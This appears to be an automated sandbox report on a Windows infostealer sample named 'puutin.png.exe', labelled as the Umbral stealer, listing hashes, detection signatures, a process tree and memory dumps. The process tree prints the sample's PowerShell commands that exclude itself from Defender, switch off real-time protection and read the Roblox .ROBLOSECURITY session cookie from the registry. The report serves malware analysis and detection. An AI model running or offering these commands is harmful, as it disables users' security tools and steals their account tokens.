Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-02-2024 09:54

General

  • Target

    puutin.png.exe

  • Size

    286KB

  • MD5

    69ae905eb53c2480dbbaeaf0070cf597

  • SHA1

    417e12e2cb4a86a1b76c7e4de1eee03aa3c55b91

  • SHA256

    41c96abcb552167c939b9f2f08e59d1608a35111dca47ecc14c6b7f7dfa1dcb7

  • SHA512

    f2700446ed7b33d233211ff8bb9072e8b78c726ea52b85e7a83ae41c006bae08f571b6f1e56f3397e99bfda7d6e87fcd0664929b80e90a806dac608b832564dc

  • SSDEEP

    6144:GloZMCrIkd8g+EtXHkv/iD4hHr0AmB5KP/Cwhl014b8e1mu0i4e+8T:woZZL+EP8hHr0AmB5KP/Cwhl0yX91T

Score
10/10

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\puutin.png.exe
    "C:\Users\Admin\AppData\Local\Temp\puutin.png.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\puutin.png.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4852
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1820
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4164
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3032
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4156
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:2916
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3308
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:4744

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      731e9e4becec0b1ef9caad4b3562d4b4

      SHA1

      6dffb77aba4e92ad5bd4b7c02fdee6f328bcd457

      SHA256

      71c7eca538938fa4d5b470fee41cfe43734e9beb9ae409d5b41111fa1a15c2d5

      SHA512

      841cf559ae5b0feec4be43018717641399b3602a553112e98b07d498f1a44169924466abc7e2313b8e8cf1c0fdc1bb7635e2818aab8269b0ef349a0ba0cd6ae5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      e2bfebaab6d49a37238034e5df120ced

      SHA1

      08ca459c5905c713b399ae2907742584a2758a00

      SHA256

      2a0b30d235a5a184e408236d17633258802301f56dd34f0cde70f47a86c863e2

      SHA512

      3f21e12af59a119c5d85ca7ef683fae842deeb5e55ac5f199c97ac6fc3fec12557974366c805749b0f3e04a2189d92174002ea0e386aee5b3f45a3b396fbac59

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      d3235ed022a42ec4338123ab87144afa

      SHA1

      5058608bc0deb720a585a2304a8f7cf63a50a315

      SHA256

      10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

      SHA512

      236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      d4a2f28ade8dd97f0adb0f71cc027c2d

      SHA1

      204f23cd6e8afb444711b24a77e5ad12a215042f

      SHA256

      feb979bbc240009176d8263f786083ea987071229008d0fdca424404b00d06ea

      SHA512

      729b70695712a6a19d6c5428a8dcab04acc4f8af61f620d5b049459a7c643c0d081b585beedca10d97a3ffa208106e48b5e2719972f31b695ed1956d7eff155a

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itoh1mna.wyt.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/664-22-0x0000024EF07C0000-0x0000024EF07D0000-memory.dmp

      Filesize

      64KB

    • memory/664-21-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/664-35-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/664-33-0x0000024EF07C0000-0x0000024EF07D0000-memory.dmp

      Filesize

      64KB

    • memory/1184-2-0x000002011ADB0000-0x000002011ADC0000-memory.dmp

      Filesize

      64KB

    • memory/1184-80-0x000002011ADB0000-0x000002011ADC0000-memory.dmp

      Filesize

      64KB

    • memory/1184-107-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/1184-85-0x0000020133650000-0x000002013365A000-memory.dmp

      Filesize

      40KB

    • memory/1184-86-0x0000020133700000-0x0000020133712000-memory.dmp

      Filesize

      72KB

    • memory/1184-0-0x0000020118F00000-0x0000020118F4E000-memory.dmp

      Filesize

      312KB

    • memory/1184-36-0x0000020133680000-0x00000201336F6000-memory.dmp

      Filesize

      472KB

    • memory/1184-37-0x0000020133600000-0x0000020133650000-memory.dmp

      Filesize

      320KB

    • memory/1184-38-0x000002011ADF0000-0x000002011AE0E000-memory.dmp

      Filesize

      120KB

    • memory/1184-67-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/1184-1-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/1820-41-0x0000021C56BE0000-0x0000021C56BF0000-memory.dmp

      Filesize

      64KB

    • memory/1820-40-0x0000021C56BE0000-0x0000021C56BF0000-memory.dmp

      Filesize

      64KB

    • memory/1820-64-0x0000021C56BE0000-0x0000021C56BF0000-memory.dmp

      Filesize

      64KB

    • memory/1820-66-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/1820-39-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/3308-99-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/3308-100-0x000002567F970000-0x000002567F980000-memory.dmp

      Filesize

      64KB

    • memory/3308-102-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/4164-79-0x0000026C322F0000-0x0000026C32300000-memory.dmp

      Filesize

      64KB

    • memory/4164-78-0x0000026C322F0000-0x0000026C32300000-memory.dmp

      Filesize

      64KB

    • memory/4164-83-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/4164-77-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/4852-19-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB

    • memory/4852-16-0x00000168A3E70000-0x00000168A3E80000-memory.dmp

      Filesize

      64KB

    • memory/4852-15-0x00000168A3E70000-0x00000168A3E80000-memory.dmp

      Filesize

      64KB

    • memory/4852-14-0x00000168A3E70000-0x00000168A3E80000-memory.dmp

      Filesize

      64KB

    • memory/4852-12-0x00000168A40D0000-0x00000168A40F2000-memory.dmp

      Filesize

      136KB

    • memory/4852-13-0x00007FFB658D0000-0x00007FFB66391000-memory.dmp

      Filesize

      10.8MB